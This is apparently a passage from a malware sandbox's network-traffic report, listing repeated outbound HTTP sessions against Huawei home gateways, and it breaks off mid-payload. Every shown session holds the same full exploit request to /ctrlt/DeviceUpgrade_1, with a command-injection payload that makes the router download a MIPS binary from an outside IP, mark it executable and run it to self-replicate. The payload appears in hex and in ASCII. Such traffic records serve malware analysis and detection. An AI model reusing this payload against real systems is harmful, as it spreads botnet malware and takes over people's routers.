                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 [TRUNCATED]
                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12192.168.2.2341094157.66.238.10237215
                                      TimestampBytes transferredDirectionData
                                      Jul 20, 2024 23:00:57.220999002 CEST851OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                      Connection: keep-alive
                                      Accept: */*
                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                      Content-Length: 482
                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 [TRUNCATED]
                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13192.168.2.2359050203.201.15.11237215
                                      TimestampBytes transferredDirectionData
                                      Jul 20, 2024 23:00:57.221016884 CEST851OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                      Connection: keep-alive
                                      Accept: */*
                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                      Content-Length: 482
                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 [TRUNCATED]
                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14192.168.2.2346136197.12.204.5237215
                                      TimestampBytes transferredDirectionData
                                      Jul 20, 2024 23:00:57.221025944 CEST851OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                      Connection: keep-alive
                                      Accept: */*
                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                      Content-Length: 482
                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 [TRUNCATED]
                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15192.168.2.2334536197.76.203.1337215
                                      TimestampBytes transferredDirectionData
                                      Jul 20, 2024 23:00:57.221016884 CEST851OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                      Connection: keep-alive
                                      Accept: */*
                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                      Content-Length: 482
                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 [TRUNCATED]
                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16192.168.2.2336278157.203.14.21737215
                                      TimestampBytes transferredDirectionData
                                      Jul 20, 2024 23:00:57.221048117 CEST851OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                      Connection: keep-alive
                                      Accept: */*
                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                      Content-Length: 482
                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 [TRUNCATED]
                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17192.168.2.2352728125.230.182.2837215
                                      TimestampBytes transferredDirectionData
                                      Jul 20, 2024 23:00:57.221090078 CEST851OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                      Connection: keep-alive
                                      Accept: */*
                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                      Content-Length: 482
                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 [TRUNCATED]
                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18192.168.2.2349188197.166.141.24537215
                                      TimestampBytes transferredDirectionData
                                      Jul 20, 2024 23:00:57.221132040 CEST851OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                      Connection: keep-alive
                                      Accept: */*
                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                      Content-Length: 482
                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 [TRUNCATED]
                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19192.168.2.2337174157.233.134.2737215
                                      TimestampBytes transferredDirectionData
                                      Jul 20, 2024 23:00:57.221132040 CEST851OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                      Connection: keep-alive
                                      Accept: */*
                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                      Content-Length: 482
                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 [TRUNCATED]
                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20192.168.2.2352906157.119.223.14537215
                                      TimestampBytes transferredDirectionData
                                      Jul 20, 2024 23:00:57.221141100 CEST851OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                      Connection: keep-alive
                                      Accept: */*
                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                      Content-Length: 482
                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 [TRUNCATED]
                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21192.168.2.235688617.113.7.10337215
                                      TimestampBytes transferredDirectionData
                                      Jul 20, 2024 23:00:57.221144915 CEST851OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                      Connection: keep-alive
                                      Accept: */*
                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                      Content-Length: 482
                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 